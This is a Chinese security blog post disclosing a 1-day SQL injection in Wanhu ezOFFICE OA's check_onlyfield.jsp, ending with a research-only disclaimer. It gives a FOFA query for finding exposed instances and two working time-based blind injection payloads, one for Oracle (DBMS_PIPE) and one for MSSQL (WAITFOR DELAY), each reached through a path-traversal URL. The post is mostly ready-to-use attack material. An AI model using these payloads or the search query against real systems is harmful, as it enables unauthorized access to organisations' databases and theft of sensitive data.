【1day】万户OA check_onlyfield.jsp sql注入漏洞

原创 十二 十二主神 2023-12-17 09:30

重要通知

师傅们，动动小手指，设个星标，灰常感谢

漏洞描述

万户OA check_onlyfield.jsp sql注入漏洞，攻击者可通过此漏洞获取敏感信息。

资产测绘

Fofa：app="万户网络-ezOFFICE"

漏洞POC

POC1
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../platform/custom/custom_form/run/checkform/check_onlyfield.jsp?fieldId=1)+AND+9632=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(65)||CHR(109)||CHR(70),3)+AND+(4917=4917

POC2
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../platform/custom/custom_form/run/checkform/check_onlyfield.jsp?fieldId=1);WAITFOR+DELAY+'0:0:3'

漏洞复现

部分界面如下所示

Nuclei脚本

免责声明：   本文章仅做网络安全技术研究使用！严禁用于非法犯罪行为，请严格遵守国家法律法规；请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。公众号发表的一切文章如有侵权烦请私信联系告知，我们会立即删除并对您表达最诚挚的歉意！感谢您的理解！